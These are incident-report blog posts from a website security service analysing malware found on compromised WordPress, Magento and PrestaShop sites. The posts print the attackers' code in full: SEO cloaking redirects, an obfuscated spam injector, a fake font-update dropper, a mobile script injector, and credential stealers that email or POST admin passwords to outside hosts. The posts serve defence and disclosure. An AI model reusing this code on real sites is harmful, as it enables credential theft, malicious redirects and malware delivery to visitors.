Author: Moe Obaid

Conditional redirection to an online pharmacy store

During an investigation, a client reported some weird behavior from all incoming visits during their Google search engine result clicks are instantly redirected to an online pharmacy store.

This occurred with visits that were initiated by clicking on any of their indexed search results at Google.com.

The malware caused all incoming visits from Google.com searches to be automatically redirected to hxxxs://pharm-bay(.) com.

After further investigation, the hacker simply hid the malicious code in an extensionless file called “log” in their tmp folder.

The malicious file was then loaded by ./wp-config.php as they had an include PHP function to load that log file.

Here is the conditional redirection rule snippet from the /tmp/logfile.

...if($content = $client->getContent()){if( (strpos($_SERVER['<strong>HTTP_USER_AGENT</strong>'], <strong>google</strong>)  !== false ) || (strpos($_SERVER['<strong>HTTP_USER_AGENT</strong>'], <strong>bot</strong>)  !== false ) ){echo $content;die;}elseif((strpos($_SERVER['<strong>HTTP_REFERER</strong>'], <strong>google</strong>)  !== false ) || (strpos($_SERVER['<strong>HTTP_REFERER</strong>'], <strong>bing</strong>)  !== false )){if($_SERVER[<strong>REQUEST_URI</strong>]!=<strong>/</strong>){?><<strong>script</strong> src=hxxp://<strong>scipton(.)com/doorways/default/script/script4.js</strong>></script><?php die;}}}...

As you can see, the malicious code is checking if the referrer is set to Google or Bing, and if so, it will serve the malicious JavaScript redirecting it to the hxxxs://pharm-bay(.)com pharmacy store.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Mar 28, 2019 by Moe Obaid

Spam Injector Disguised as a License Key

A client reported some weird spam URLs injected on their WordPress website and after an investigation, it turned out that the hacker was hiding the encoded spam injector malware in the following theme file:

./wp-content/themes/toolbox/functions.php

The hacker formatted the encoded injector to look like a theme’s license key trying to distract eyes from suspecting this code and finding the malware:

/**
 * Theme personal token soft descriptor.
 */
function theme_personal_token() {
    // Your personal token key #00118
    $token = <<<KEY
eyJsaWNlbnNlIjoiY3JlYXRlX2Z1bmN0aW9uIiwiYWNjb3VudCI6IiR4IiwidGhlbWUiOiJldmFs
KFwiPz5cIi5nemluZmxhdGUoYmFzZTY0X2RlY29kZSgkeCkpKTsiLCJ1cGRhdGUiOiJiWkY3YzZK
SUZNV1wvaXV0UWcxYXlHdkU5eG14RUVCXC9CRnhBbGxrVzEwa2hMODdDN0llcVE3NzQ0czdzMTJk
MFwvNzdtbjd2MmRleFwvXC9pTndveFwvbmRJdzBEeTRiNzBJYUZ3eFVGRGdZTUZuYUF3a2J0YjUz
...
ZlBsemhjNHZNNXlpNFlkdk5SU0JGRFlmQU43R2lJWXdZN0dEcnMyK1wvdGRyc1ZuVHY1cDh3UFN2
eGpHVHp4blkrUFhcL1phODVtbWJcL2lJM3hhXC9mdjFISEl4ZVpHMlRkXC9MYlRUNEFQc3h2XC94
MUU2eTlIY1wvMkhjZHBUNVN3TTUzUnRSRzd1Mnd0S3Ywd3VcL2RcL0FUaGJzczg3OHlQcXJsd0Ur
STJyRkVRNkJEVzNMUVRpYmlqT0laejlNNEg4YTk1eFQ3RHl6TUw1ZHpybVwvcVQ1RFAwbUtXZUNQ
UHdFPSJ9
KEY;
    if( $token = json_decode( base64_decode( $token ), true ) ) {
        $token['license'] = $token['license']( $token['account'], $token['theme'] );
        $token['license']( $token['update'] );
    }
}
add_action( 'wp_footer', 'theme_personal_token' );

The injected code contained a few layers of encoding to further obfuscate it from detection, but we can begin by decoding the base64-encoded text within the $token variable:

{"license":"create_function","account":"$x","theme":"eval(\"?>\".gzinflate(base64_decode($x)));","update":"bZF7c6JIFMW\/iutQg1ayGvE9xmxEEB\/BFxAllkW10khL87C7IeqQ7744s7s12d0\/77mn7v2dex\/\/iNwox\/ndIw0Dy4b70IaFwxUFDgYMFnaAwkbtb53Hry+7HVUP0lx4nagtPB4IRHPoKhp5WgUfpso0WEwmpNG8zDzQjNv6UDhLZ+iY1VmtIpPVsG43kDR8d+vjiUJG7eVUqRwNJYjkPdbvjn2g...skipped...\/LbTT4APsxv\/x1E6y9Hc\/2HcdpT5SwM53RtRG7u2wtKv0wu\/d\/AThbss878yPqrlwE+I2rFEQ6BDW3LQTibijOIZz9M4H8a95xT7DyzML5dzrm\/qT5DP0mKWeCPPwE="}

As shown by the above decoded content, we can see that the hacker is still trying to disguise the malware as a type of licensing key for a theme.

This conditional if statement also checked for the user agents, showing the spam URLs to any and all other user agents/search engines except the ones shown below. It tried to hide it from some web-based link-analyzing tools as it may be cached by such tools and the client may be notified:

if(!preg_match('#ia_archiver|Baidu|MJ12|Ezooms|Solomono|roger|Linkpad|Semrush|prodvigator|Survey|Alexi|Xenu|Ahrefs|serpstat|Yandex#i', $k)

The final decoded payload with hidden links as it would appear within the HTML source:

<a href="hps://credit-10[.]com/no/komplett-bank-logg-inn/" style="position:absolute;left:-9998px;">komplett bank min side</a><a href="hxxp://emporium[.]com.ua/answear" style="position:absolute;left:-9998px;">промокод ансвер</a><a href="hxxps://evehealth[.]ru/promokody/shops/promokody-onetwotrip" style="position:absolute;left:-9998px;">onetwotrip промокод</a><a href="hxxps://promocodius[.]com/us/shops/iherb" style="position:absolute;left:-9998px;">iherb coupon</a>

The links are hard-coded inside this malware, but on different sites they may be different. The domains of the spammy sites remain mostly the same though.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Jan 7, 2019 by Moe Obaid

Fake Font Dropper

A website owner reached out to us to investigate a weird behavior on their site. It was randomly showing a popup window for a missing font and telling the visitors that they are unable to view the content of the site because their own computers are missing a required font by the website called “HoeflerText”, as shown in this screenshot:


The malware tried to trick visitors to click on the “Update” button to download a malicious file called : Font_Update.exe

The code started with this at the top of the injected WordPress core file ./index.php and it’s checking for the browser type and version targeting, in this case, only Chrome browsers, as you can see in the below code:

   <script>    if (!!window.chrome && !!window.chrome.webstore) {         function FPGo() {            search = unescape('%2F%5B%5E%3C%3E%5C%5C%6E%5C%5C%73%5D%2F%69%67%6D');            pr = document.body.innerHTML;            result = pr.match(/>(w?s?.*?)</g);            result_arr = [];            for (var i = 0; i < result.length; i++) {                result_arr[i] = result[i].replace(eval(search), '&#0;')            }            for (var i = 0; i < result.length; i++) {                pr = pr.replace(result[i], result_arr[i])            }            document.body.innerHTML = pr        }        FPGo();    }</script>

The other regex and code is responsible for displaying the page incorrectly to the client. It looks damaged or corrupted to try to convince them that it’s all due to the missing font on their computers.

The other part of the malicious code was this one that’s responsible for showing the popup window and the alert to the visitors about this missing “HoeflerText” font on their computers:

   <div id="dm-table"><a href="javascript:void(0)" onclick="document.getElementById('dm-overlay').style.display = 'none'; setTimeout(dy0,1000);" id="cl0se"></a><img id="l0gos" alt='' />                    <p id="pphh">The "HoeflerText" font wasn't found.</p>                </div>                <div id="odiv9">                    <p id="info1">The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".</p>                    <p id="info2" style="display:none;">Step 1: In the bottom left corner of the screen you'll see the download bar. <b id="bbb1">Click on the Font_Update.exe</b> item.<br id="brbr1" />Step 2: Press <b id="bbb1">Yes(Run)</b> in order to see the correct content on the web page.</p>                    <div id="divtabl">                        <table id="tabl1">                            <tbody id="tbody1">                                <tr id="trtr1">                                    <td id="tdtd1">Manufacturer:</td>                                    <td id="tdtd1">Google Inc. All Rights Reserved</td>                                </tr>                                <tr id="trtr1">                                    <td id="tdtd1">Current version:</td>                                    <td id="tdtd1">Chrome Font Pack <b id="bbb2">53.0.2785.89</b></td>                                </tr>                                <tr id="trtr1">                                    <td id="tdtd1">Latest version:</td>                                    <td id="tdtd1">Chrome Font Pack <b id="bbb2">57.2.5284.21</b></td>                                </tr>                            </tbody>                        </table>                        <div id="helpimg"><img id="inf0s" alt='' /></div>                    </div>                    <form action="https://another-hacked-website.com/avx/images/x86x.php" method="post" id="form_1d"><input type='hidden' name='infol' value='i+veHk+yCYMGJN0u3V+Nq1SdFdRlNVmXm+k+oC6hANGXowqEYpTQww==' /></form>                    <div id="upe0" onclick="ue0()"><a href="javascript:void(0)" id="b00tn">Update</a></div>                </div>            </div>        </div>    </div>    <div id="popup-container" class="popup-window gc" style="display:none;">        <div class="bigarrow element-animation"></div>

The hackers were storing the hxxps://Another-Hacked-site[.]dom/avx/images/x86x.php file on another hacked website.

Once the visitor clicks on the Update button to download the fix for the missing font, he or she will be redirected to a Dropbox URL that’s hosting the malicious Font_Update.exe file.

Conclusion: This incident is showing how important website security is to both website owners and visitors. It’s a huge responsibility on the website owners end to provide a malware-free website experience to their visitors, members, and customers while on eCommerce sites especially, to avoid infecting their computers and others devices with viruses or spyware that can cause data loss, or steal sensitive information (such as login or credit card info, and passwords) used on other websites for purchases and online banking. Spying on their actions and keylogging it or monitoring and managing their infected computers/smartphones remotely or using it to initiate and launch attacks (i.e: DDoS) plus many other possible malicious actions that can be done by an installed virus/malware on their computers, smartphones, or other devices.

Let us know if you see or suspect any weird behavior on your website and we will be happy to investigate and clean it for you.

Jun 14, 2018 by Moe Obaid

Mobile Malware Targets eCommerce Websites & Users

A mobile malware is a malicious software that targets mobile/smartphones, tablets and similar devices. The attacks may vary from fatal damage to the OS (bricking) to leakage of sensitive and personal information, such as credit card, saved passwords, pictures and much more.


With the constant growth of mobile users, attackers are focusing their efforts on developing malware targeting those devices. In this article, we’ll describe how we detected an interesting attack against an ecommerce platform.

During an Incident Response investigation, we identified a malicious code in a Magento installation located at the “./js/mage/cookies.js” file. Here is the snippet:

var _$_f51c = ["userAgent", "vendor", "opera", "test", "substr", "<script type="text/javascript" src="hxxp://Malicious-URL-REMOVED.com/odessa/?md2"></script>", "write"];function isMobile() {    var _0x1CF01 = (navigator[_$_f51c[0]] || navigator[_$_f51c[1]] || window[_$_f51c[2]]);    if (/android.+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|symbian|treo|up.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i [_$_f51c[3]](_0x1CF01) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i [_$_f51c[3]](_0x1CF01[_$_f51c[4]](0, 4))) {        return true    };    return false}if (isMobile() === true) {    document[_$_f51c[6]](_$_f51c[5])}

The function isMobile() checks if the visitor is using any of the predefined list of smartphones/tablets and if it matches, the user will be redirected to other malicious websites.

These other websites will prompt to install third-party software that claims to clean or speed up mobile devices, toolbars, adware or even worse, malicious URLs distributing ransomware that will lock the device and hold it hostage until you an X amount of money is paid to the attacker via bitcoin.

Depending on the attacker’s campaign, they may also redirect visitors or potential buyers to competitor websites, therefore causing a huge impact on the site owner’s revenue. Keep in mind that these attacks are not limited to Magento websites only as it may target WordPress, Joomla, OpenCart, Prestashop, and different other platforms.

To detect and prevent these issues, we highly recommend having a File Integrity Monitoring System in place and clean backups of your files/database. If your environment happens to be compromised, you’d be able to identify and promptly restore the files preventing any further damages to your online presence and SEO.

Feel free to contact us if you are experiencing a similar issue or if you have any other security concerns.

Aug 11, 2017 by Moe Obaid

PrestaShop Login Stealer

Lately, we’ve noticed an increase of login credentials stealing attempts and techniques targeting e-commerce based websites. These websites usually have sensitive information (credit card & back-end credentials) that would allow attackers to take advantage of the information & infected website.

This post will uncover a different technique being used against PrestaShop solutions. The technique varies from the one we described in this blog post here.

In this case, attackers also used the ‘./controllers/admin/AdminLoginController.php’ file but they injected a different malicious code:

eval(gzinflate(base64_decode("VZBvS8MwEMbfD/YdjlJICz<CONTENT EDITED>UfYHOdgoOBMMc2fGNdObtLF82f9d5p/AQ==")));

Here is the decoded version of the malicious code:


<?phpif(function_exists("mail")){    $listo = array( 'eNyong' => 'a<removed>@<removed>mail.com', 'Dowoh' => 'm<removed>l@<removed>mail.com');    foreach($listo as $ming => $imel){        mail($imel,'Setoran Admin '.$_SERVER['HTTPHOST'].' ^^',"Kye Pak $ming,nnNama: ".$employee->firstname." ".$employee->lastname."nEmail: $emailnPassword: $passwd");    }}else{$f=fopen('uspas.txt','a');fwrite($f,"imel:$email | pass: $passwdn");fclose($f);}?>

The attackers used an interesting conditional statement that would give them the information they were after regardless of server limitations. In other words, they were checking if the server had mailing capabilities to send all the sensitive data to a specific address but if it didn’t, it would simply write into the system a file called ‘uspas.txt’ with the username and password.

From there attackers could just choose between checking the e-mail or accessing the .txt file into the victim’s website.

In case of a compromise, we should consider that all user accounts and their personal information were stolen, therefore it’s recommended changing all passwords from the back-end, cPanel, SFTP and other connection mechanisms that could give attackers any leverage.

Business’s reputation can be damaged if any sensitive information or unauthorized use of customer’s credits card information fall into the wrong hands, therefore keeping good security practices, such as having a File Integrity Monitoring, Web Application Firewall and other methods will help reducing the risks of infection.

Oct 27, 2016 by Moe Obaid

Magento Login credentials stealer

While investigating a compromised Magento-based ecommerce website, we found a malicious code that’s being used to steal and maintain unauthorized access to user accounts.

This malicious code was found inside the ./app/code/core/Mage/Admin/Model/Session.php core file and it’s posting the stolen credentials to a malicious URL every time a user tries to log into their own account:

$post = $_SERVER['HTTP_HOST']."=".base64_encode(json_encode(array($username,$password,$
user->getEmail(),Mage::helper('core/url')->getCurrentUrl())));$ch = curl_init();curl_setopt($ch,CURLOPT_URL, base64_decode(REMOVED MALICIOUS CODE));curl_setopt($ch,CURLOPT_POST, 1);curl_setopt($ch,CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_TIMEOUT, 20);$output = curl_exec($ch);curl_close($ch);

The above malicious code is sending and posting the stolen username & password to the encoded URL in that part of the code: base64_decode(REMOVED MALICIOUS CODE));

This is a base64_decode code and in that case it was sending and posting the information to this malicious URL:

http://infected-site.com/404.php

Customer personal information (including their full name, email address, physical address which may also have any stored credit cards and payment information) are considered to be compromised and leaked.

The hacker may also redirect the payments to their own PayPal account or to any other payment gateways to steal money too, as long as they have full control over the administration panel of the Magento website.

Such attacks may have a severe and negative impact on your business reputation and customer's trust.

It’s always a good practice to keep your website updated and properly maintained as well as using applications, themes, and extensions/plugins from trusted sources only.

It’s time now to secure your website from hackers!

Oct 26, 2016 by Moe Obaid